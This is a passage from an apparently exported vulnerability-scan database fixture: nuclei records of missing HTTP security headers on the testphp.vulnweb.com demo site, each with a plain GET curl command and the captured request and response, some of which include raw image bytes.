`�dR�-��b\u0002��\u001d(!^��L�\\�Z\u0005����J�,ņ\u0006;\fg����ߨ�a��ԗ\u001af�,Q�X��n�\u0004�%�9\u0019V�;�3�\u001cv[�k\u000b)�YA�����A�\u0019��\u000f��\u0016��\u001a���s~>�c{q$�4r\b�"�IȐ�<�Kc䚶�3Hǽ�5\r\u0016h�����Z�Ao���[WGu����jVs�(�}5�.^\u0010�\u00138bQ@]ː9<�}�kg�\u001f\u0007k.@8a�23��kJ�.��Ӭn.���P��E\n�\u001cl�\u0018����p�x>�ʫ)\u0015�A\u001b��Y$���Ycm�c�\u0018\\|g�{��Q��Բ�YL�X��\u0002�w/~�\u001c��:glz}n��\u0014����eWJ�n�\u0014QE\tK��S�?�\u001e���e��2�~����~(E�h��w���Tl�⤢�\u0003eRH�v��@�\u0004�3�\t<e~���W\b��vn\u0018n\u0001�y ��\u0012��G\u0016��)�6ޙ �������3\u001b��?\u0014�7\u0002\u0017�l��Դ�.QU��E�#�~8#8$g���ޑ-�^��Kp���aLͱG~\u0013;s�8�'�q\\�􃨮.\u0012]\u001a�帒\u0012\u001a\u0007 �H�\u0014�\u0003\u0001U��'�'\u001c\fV��j����Z��%\t\u001eb�Uf�;\u0010�X/%w0�9�k*�����4;���\u0015ޒx*!�:�\u0019X�n�^�%�\u0001�0�F�I��\u0018��8 \u001c��d2�\u0007���ŧY�a�8�t��Q\u0019db��\u0018��I\u0018�rN1��V8�\u0015�QD�Jv���\u001fUI������D�K[�qf���*�m\u0004�\u0019�?8�#=�Z����.��I�C��b��\u001c[��#ö<n\bW�\u0005��8 �9��6IP�\t���yq\u001c��7PA��=��\u0015�0 1�+s��2\u0006pO��*�9.����d��=R�d<��\\��\u001f��l���\u000f�ț,\be�q�8$v�<g�\u0017�y���M�ҭ�./�`N@P\u0019�\u0004�\u00120q�ۃ�v\u0016\u001b�"��Ťv2q���ѩ��\u001eI(��ez\u0017������F�(��$�(?ju\u0015�ۨ�~iʠS��Ⱥ\u0001 �RJŁ&��v���\u0005\u0001:\u000b��+������>U���ߐFA\u001eA"��D�V}C���\u0005\f���wo'��\u0019'i�T��|�������\u001c�CE֯�[�u�ʊ���H�ш�q�\u0016\\�\u001c3\f�j\u001fX�;|<,6p�|���ON���]���Wf�ڰ.�Vu \u0015�\u0006\u0016@G�9<\u001e���\u001d�����Giz�Ŕ:��ۥ���T��h��z��\u0006=�vFs�r\t�4�s^�7��Ý�\u0011�FW��>T�\ft�V$��O�[����\u0013\bcc#M\u0004�\u0019W����Gܮ\u001c��\n~r(i��jw\u0006\u0018Z<�/���F��x\u0007\u0004�b21��m�u�XZ�*�Fھ��ҰEM��$*������c���D}��RzE\u0003��H���a��\u001a�{�0���s����2�(��ך�\u00063ڢ����F�(��"�(�\b��(Bl�mEE\u0015Ġ�\u0006�'=袄���\u000e�w�j�wd�:�Y\u0018e%O(�ʜv�\u00020@5�:�6WWqDIX����q�E\u0015�n�\u0007����x�ߴ�+m6��e\nč#;rX�\u001e�I$��w�\u0006�\\0\u0017�7��U\u0003\r\u0018\u000b��\u0011��9\u0018�\u0004w�<`��Ⱦ$�/����*�rțö>�W��\u0013�O.�=�П�.�\u0004\u0001��c�Y!\n��Wv�v�\u0019e\u0007�\u0015��f��ӧ��mn����B������8ݑ�؁��<`��(�:��\u000f�L�Od�����1��igw|��)��\u0004��\u00078����;�98�@�E\u0015\u0017�1���E�\u001f`�����\u0002�}���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 865, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L", + "discovered_date": "2024-11-13T02:42:15.327Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 866, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin", + "discovered_date": "2024-11-13T02:42:15.497Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access this resource.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 867, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2", + "discovered_date": "2024-11-13T02:42:15.679Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 868, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3", + "discovered_date": "2024-11-13T02:42:15.861Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 869, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/2.jpg.tn", + "discovered_date": "2024-11-13T02:42:16.055Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/2.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1353\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-549"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001a\u0002\u0003\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006��+\u0010\u0002\u0002\u0001\u0004\u0002\u0002\u0004\u0007\u0001\u0002\u0011\u0003\u0004\u0012!1AQ"a\u00142q�\u0005\u0013$B�����\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0001\u0002\u0004\u0005\u0006\u0007��'\u0011\u0002\u0002\u0001\u0004\u0002\u0002\u0001\u0005\u0001\u0001\u0002\u0011\u0003\u0004\u0012!1\u0005Q\u00132A"#3aq���\f\u0003\u0001\u0002\u0011\u0003\u0011?���d�H䏺JU�\t\u000f\b�i{\u0015+f�.7<������B6�˨����͒\u001bdס\u001a�i�E�n�_��%\u001atN\f�pR�H\u001d�,֝�\u0001 \u0014@'DQ\u0003Qu?b�-\u0010\u0005�L\t-\u0005�\u0001��\fH�'A\u0015F�\u001a�ʔ?z3G�^�|����b�#����K�)�ۓ�l�%��"䨤�\u001f�u\u0015Ed44�2\u0005�S�D\u0002Y\u0005F�`H\u0001\r\u0011L`"�)4(\fF�,�����\u0003%C�9��1F�$�c$��\u000f�~�Q_�ק{c'K�#��r|�R��(�Ԥ�I}#;��k�ʚ��ϳf���EmZ\u0010��\u0012Kȶ�А��C\u0001Z\u001a�B�\u0006Ҵ1I\n\u0004�X�\u001com�\u0004�,�7\u000e�}�\\1�,�\u001f\u0017��#�wG�ϫ�\u0016���dPf�<\u0013�K��G�4j��\u001c�i�$���a���j�4C\u000b���g�8�`�.�Μy)�N��?��j��\u001a�*�w\u0016�����),\u0012�5b����/�g%��[7e�b�\u001a�/�$�fiƎ֛3�����Х�5b�ޥ�@%Ţ\b\u0019v\u0014E\u0012M�(�\u0018\b�w1h��(���\u001e\u001a7��C\u001c���_�\f{,��َ[]��kp��p}\u001d?ĹI��'�&�jq���0����WO����kV���}\u001bq�|�c]�q5\u0018��p\u0013�J�3��]Fhe�\u0018��K�4�%r}��W��à��d�h�}��-�\\��\u001c�E��+B�+^�4j��\u0004\u0010�}�\u0004\fN�qb�Qe?e`6�\u001b~Ȣې�6߲v��܄&��\u0014C��J�x�\n>njlԑ��5CEY�3��j=�\nʱ��եj�б�N����f�p���k3��Ҿ�9���}3t���ψ�2J4�N\rvt���O��\u0018��>�q�%��\t��\u001fB��e�\u001bJ�\u001e�QM"(�»^,]�e\\FG2k�WAC�\r��.�bPQf���t[^\tP��Σ�(���\u00126�6�YlJ&���I\u0013D<���d\u0017 \u0006��p2�\u000e��m%\u000e6���uc���V��}��\u001dl*⏝y�J\u0019�K�Nn�N\u0012x�䋤rr%`\u0006-W���\u0013���Ed(�\u0003!�����P�8��k��\u0005)�?,+���;5\u0012�\f2���+��\u0004��e�2�\t7�6-"v�\u0001f�d�&ͺXA���Sh~�\\�W���%O��r��c\u0014�\u0004>Ό\u001b�CHe\u0014\b��\u0007��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 870, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/_mmServerScripts", + "discovered_date": "2024-11-13T02:42:16.238Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /_mmServerScripts HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /_mmServerScripts/</title></head>\r\n<body>\r\n<h1>Index of /_mmServerScripts/</h1><hr><pre><a href="../">../</a>\r\n<a href="MMHTTPDB.php">MMHTTPDB.php</a> 11-May-2011 10:27 2111\r\n<a href="mysql.php">mysql.php</a> 11-May-2011 10:27 10634\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 871, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3", + "discovered_date": "2024-11-13T02:42:16.417Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 872, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/hpp", + "discovered_date": "2024-11-13T02:42:16.605Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /hpp HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<title>HTTP Parameter Pollution Example</title>\r\n\r\n<a href="?pp=12">check</a><br/>\r\n\r\n<hr>\r\n<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 873, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/login", + "discovered_date": "2024-11-13T02:42:16.784Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 874, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l", + "discovered_date": "2024-11-13T02:42:16.975Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /bxss/adminPan3l HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<head>\n <title>Administrative panel</title> \n <link rel="stylesheet" type="text/css" href="style.css"> \n</head>\n \n<body>\n<p> \n <center>\n <img src="http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png" alt="Acunetix website security">\n <h2>Administrative Panel</h2>\n </center>\n</p> \n \n<b>Last 100 visitors on this site</b>\n\n\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\n\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\nWebsite is out of order. Please visit back later. Thank you for understanding.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 875, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'", + "type": "http", + "http_url": 